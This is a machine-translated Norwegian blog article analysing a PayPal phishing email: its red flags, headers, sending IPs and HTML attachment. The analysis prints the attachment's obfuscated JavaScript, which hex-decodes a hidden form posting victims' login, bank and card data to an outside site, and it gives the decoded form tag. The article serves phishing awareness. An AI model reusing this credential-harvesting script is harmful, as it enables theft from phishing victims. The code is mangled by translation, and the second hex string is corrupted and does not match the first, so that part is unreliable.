Online sikkerhet: Bryte ned anatomien til en phishing-e-post

Jun 25, 2025
Personvern og sikkerhet
UCACHED INNHOLD


I dagens verden der alles informasjon er online, er phishing et av de mest populære og ødeleggende angrepene på nettet, fordi du alltid kan rense et virus, men hvis bankopplysningene dine blir stjålet, er du i trøbbel. Her er en oversikt over et slikt angrep vi fikk.

Ikke tro at det bare er bankopplysningene dine som er viktige: når alt kommer til alt, hvis noen får kontroll over kontoinnloggingen din, kjenner de ikke bare informasjonen i kontoen, men oddsen er at samme påloggingsinformasjon kan brukes på forskjellige andre kontoer. Og hvis de kompromitterer e-postkontoen din, kan de tilbakestille alle de andre passordene dine.

Så i tillegg til å beholde sterke og varierende passord, må du alltid være på utkikk etter falske e-poster som utgir seg for å være den virkelige tingen. Mens de fleste phishing-forsøk er amatørmessige, er noen ganske overbevisende, så det er viktig å forstå hvordan man kan gjenkjenne dem på overflatenivå, samt hvordan de fungerer under panseret.

Bilde av asirap

Undersøke hva som er i vanlig syn

Eksempel på e-post, som de fleste phishing-forsøk, "varsler" deg om aktivitet på PayPal-kontoen din, som under normale omstendigheter ville være alarmerende. Så oppfordringen til handling er å bekrefte / gjenopprette kontoen din ved å sende inn omtrent alle personlige opplysninger du kan tenke deg. Igjen, dette er ganske formelt.

Selv om det absolutt er unntak, er stort sett hver phishing- og svindel-e-post lastet med røde flagg direkte i selve meldingen. Selv om teksten er overbevisende, kan du vanligvis finne mange feil strødd over hele meldingsdelen som indikerer at meldingen ikke er legitim.

Meldingslegemet

Ved første øyekast er dette en av de bedre phishing-e-postene jeg har sett. Det er ingen stavefeil eller grammatiske feil, og ordlyden leser i henhold til hva du kan forvente. Imidlertid er det noen få røde flagg du kan se når du undersøker innholdet litt nærmere.

  • “Paypal” - Den riktige saken er “PayPal” (kapital P). Du kan se at begge variantene blir brukt i meldingen. Bedrifter er veldig bevisste med merkevarebygging, så det er tvilsomt at noe slikt ville bestå korrekturprosessen.
  • “Tillat ActiveX” - Hvor mange ganger har du sett en legitim nettbasert virksomhet på størrelse med Paypal bruke en proprietær komponent som bare fungerer i en nettleser, spesielt når de støtter flere nettlesere? Visst, et sted der ute gjør et eller annet selskap det, men dette er et rødt flagg.
  • "Sikkert." - Legg merke til hvordan dette ordet ikke stemmer overens med resten av avsnittsteksten. Selv om jeg strekker vinduet litt mer, vikler det ikke inn eller plasserer riktig.
  • “Paypal!” - Plassen før utropstegnet ser vanskelig ut. Bare en annen særegenhet som jeg er sikker på ikke ville være i en legitim e-post.
  • “PayPal-kontooppdateringsformular.pdf.htm” - Hvorfor vil Paypal legge ved en “PDF”, spesielt når de bare kan lenke til en side på nettstedet sitt? I tillegg, hvorfor skulle de prøve å skjule en HTML-fil som en PDF? Dette er det største røde flagget av dem alle.

Meldingsoverskriften

Når du tar en titt på meldingsoverskriften, vises et par flere røde flagg:

  • Fra-adressen er [email protected] .
  • Adressen mangler. Jeg tømte ikke dette, det er ganske enkelt ikke en del av standard meldingshode. Vanligvis vil et selskap som har navnet ditt tilpasse e-posten til deg.

Vedlegget

Når jeg åpner vedlegget, kan du umiddelbart se at oppsettet ikke stemmer, da det mangler stilinformasjon. Igjen, hvorfor skulle PayPal sende et HTML-skjema via e-post når de bare kunne gi deg en lenke på nettstedet deres?

Merk: vi brukte Gmails innebygde HTML-vedleggsvisning for dette, men vi vil anbefale at du IKKE ÅPNER vedlegg fra svindlere. Aldri. Noensinne. De inneholder ofte utnyttelser som vil installere trojanere på PCen din for å stjele kontoinformasjonen din.

Å rulle litt mer ned kan du se at dette skjemaet ikke bare ber om PayPal-påloggingsinformasjonen vår, men også om bank- og kredittkortinformasjon. Noen av bildene er ødelagte.

Det er åpenbart at dette phishing-forsøket går etter alt med ett slag.

Den tekniske sammenbruddet

Selv om det burde være ganske klart, basert på hva som er tydelig at dette er et phishing-forsøk, skal vi nå bryte ned den tekniske sammensetningen av e-posten og se hva vi kan finne.

Informasjon fra vedlegget

Den første tingen å se på er HTML-kilden til vedleggsskjemaet, som er det som sender inn dataene til det falske nettstedet.

Når du raskt ser på kilden, ser alle lenkene ut som gyldige, ettersom de peker på enten “paypal.com” eller “paypalobjects.com” som begge er legitime.

Nå skal vi ta en titt på grunnleggende sideinformasjon Firefox samler på siden.

Som du kan se, er noe av grafikken hentet fra domenene “blessedtobe.com”, “goodhealthpharmacy.com” og “pic-upload.de” i stedet for de legitime PayPal-domenene.

Informasjon fra e-postoverskriftene

Deretter tar vi en titt på de rå e-postmeldingsoverskriftene. Gmail gjør dette tilgjengelig via menyalternativet Vis original i meldingen.

Når du ser på topptekstinformasjonen for den opprinnelige meldingen, kan du se at denne meldingen ble komponert ved hjelp av Outlook Express 6. Jeg tviler på at PayPal har noen i staben som sender hver av disse meldingene manuelt via en utdatert e-postklient.

Når vi ser på rutingsinformasjonen, kan vi se IP-adressen til både avsenderen og den videresendende e-postserveren.

IP-adressen "Bruker" er opprinnelig avsender. Gjør en rask oppslag på IP-informasjonen, kan vi se at den sendende IP-en er i Tyskland.

Og når vi ser på den videresendende e-postserveren (mail.itak.at), IP-adressen, kan vi se at dette er en ISP-basert i Østerrike. Jeg tviler på at PayPal ruter e-postene sine direkte gjennom en ISP-basert ISP når de har en massiv serverfarm som lett kan håndtere denne oppgaven.

Hvor går dataene hen?

Så vi har tydelig bestemt at dette er en phishing-e-post og samlet litt informasjon om hvor meldingen stammer fra, men hva med hvor dataene dine sendes?

For å se dette, må vi først lagre HTM-vedlegget på skrivebordet vårt og åpne i et tekstredigeringsprogram. Når du blar gjennom det, ser det ut til at alt er i orden, bortsett fra når vi kommer til en mistenkelig Javascript-blokk.

Å bryte ut hele kilden til den siste blokken av Javascript, ser vi:

<skriptspråk = ”JavaScript” type = ”tekst / javascript”>
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
Var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for (i = 0; i <x.length; i + = 2) {y+=unescape(‘%’+x.substr(i,2));}document.write (y);
</script>

Hver gang du ser en stor sammenblandet streng med tilsynelatende tilfeldige bokstaver og tall innebygd i en Javascript-blokk, er det vanligvis noe mistenkelig. Ser vi på koden, blir variabelen “x” satt til denne store strengen og deretter dekodet til variabelen “y”. Det endelige resultatet av variabelen “y” skrives deretter til dokumentet som HTML.

Siden den store strengen er laget av tall 0-9 og bokstavene a-f, blir den mest sannsynlig kodet via en enkel ASCII til Hex-konvertering:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f2f7777772e64657870626f737267327f2e64657870626f737267327f2e646578706f73726732742f73742220616374696f6e3d22687474703a2f2f2f7777772e646578706f737267327f57e646578703a2f2f2f7777772f57706

Oversettes til:

<form name = ”main” id = ”main” method = ”post” action = ”http://www.dexposure.net/bbs/data/verify.php”>

Det er ikke tilfeldig at dette dekoder til en gyldig HTML-skjema-kode som ikke sender resultatene til PayPal, men til et useriøst nettsted.

I tillegg, når du viser HTML-kilden til skjemaet, vil du se at denne skjemikoden ikke er synlig fordi den genereres dynamisk via Javascript. Dette er en smart måte å skjule hva HTML-en faktisk gjør hvis noen bare skulle se den genererte kilden til vedlegget (som vi gjorde tidligere) i motsetning til å åpne vedlegget direkte i en tekstredigerer.

Kjører en rask whois på det fornærmende nettstedet, kan vi se at dette er et domene som er vert hos en populær webvert, 1and1.

Det som skiller seg ut er at domenet bruker et lesbart navn (i motsetning til noe som "dfh3sjhskjhw.net") og domenet har blitt registrert i 4 år. På grunn av dette tror jeg at dette domenet ble kapret og brukt som en bonde i dette phishing-forsøket.

Kynisme er et godt forsvar

Når det gjelder å være trygg på nettet, gjør det aldri vondt å ha litt kynisme.

Selv om jeg er sikker på at det er flere røde flagg i eksempelet e-post, er det vi har påpekt ovenfor indikatorer vi så etter bare noen få minutters undersøkelse. Hypotetisk, hvis overflatenivået til e-posten etterlignet sin legitime motstykke 100%, vil den tekniske analysen fremdeles avsløre dens sanne natur. Dette er grunnen til at det er viktig å kunne undersøke både hva du kan og ikke kan se.

.post-innhold .inngangs-bunntekst

Breaking Bad Security Tutorial 1 - Email Phishing

Anatomy Of Phishing Campaigns: A Gmail Perspective

How To Identify A Phishing Email

[CYBER FRIGHT] Anatomy Of A Phishing Email

Security Awareness Quick Tip: How To Identify And Avoid Email Phishing Scams - Part 1

Cyber Security & Phishing

Understanding Anatomy Of Phishing Attack

Anatomy Of A Phishing Attack With DNSFilter

8th PPO-SA Webinar: Cyber Security: Beware Of Phishing Attach!

Cybersecurity Training How To Spot A Phishing Email

The Truth About Phishing: It Only Takes One

Anatomy Of Scam Emails - How To Recognise A Phishing Scam Message

Phishing Attack Example - How To Spot A Scam Email

What Is Phishing?

How To Spot A Phishing Fraud Email - Fun With Phishing | Tech Tip Tuesday

Hands-on Computer Security & Incident Response -- Email Header Analysis Part 1

Anatomy Of A Spearphishing Attack


Personvern og sikkerhet - Mest populære artikler

Slik fjerner du PIN-koden og andre påloggingsalternativer fra Windows 10

Personvern og sikkerhet Oct 23, 2025

Windows 10 har en rekke sikkerhetsfunksjoner for å holde PC-en trygg. Men hva om du trenger å fjerne passord eller sikkerhetsnøkkel? Denne veiledningen viser hvordan du fjerner P..


Hvordan hindre folk i å vite at du leser meldingen deres på Facebook

Personvern og sikkerhet May 12, 2025

Facebook er det mest populære sosiale nettverket på internett, og som et resultat er dets meldingstjeneste en veldig vanlig måte for folk å kommunisere privat med hverandre. Imi..


Hvordan låse Mac-en din når du er borte

Personvern og sikkerhet Mar 30, 2025

UCACHED INNHOLD Lei av at barna dine eller romkameraten legger ut dumme ting på Facebook-kontoen din hver gang du forlater rommet? Alt du trenger å gjøre låser Mac-en din for ..


Slik selger du Steam-handelskortene dine (og får gratis Steam-kreditt)

Personvern og sikkerhet Sep 20, 2025

Damphandelkort er i utgangspunktet gratis penger. Forutsatt at du eier noen spill på Steam, genererer du sannsynligvis Steam-handelskort uten å engang innse det - og du kan selge ..


Hvordan den “store brannmuren i Kina” fungerer for å sensurere Kinas internett

Personvern og sikkerhet Sep 10, 2025

UCACHED INNHOLD The Great Firewall of China, offisielt kjent Golden Shield-prosjektet, benytter en rekke triks for å sensurere Kinas Internett og blokkere tilgang til forskjellig..


Slik feilsøker du Macen din med Activity Monitor

Personvern og sikkerhet Jul 12, 2025

Det er ikke mange tilfeldige brukere som vet om OS Xs Aktivitetsmonitor, og færre forstår fortsatt hvordan det fungerer og hva det virkelig kan gjøre. Slik bruker du Akt..


Advarsel: Krypterte WPA2 Wi-Fi-nettverk er fremdeles sårbare for snooping

Personvern og sikkerhet Dec 8, 2024

Nå vet de fleste at et åpent Wi-Fi-nettverk lar folk avlytte trafikken din. Standard WPA2-PSK-kryptering skal forhindre at dette skjer - men det er ikke så idiotsikkert som du ka..


Hvorfor tar en nettleser automatisk kontakt med ukjente tredjepartsnettsteder?

Personvern og sikkerhet Jan 23, 2025

UCACHED INNHOLD Selv om vi kanskje ikke tenker på det veldig mye, skjer det ganske mye mer ‘bak kulissene’ enn vi kanskje skjønner når vi surfer på internett. Vi undersøk..


Kategorier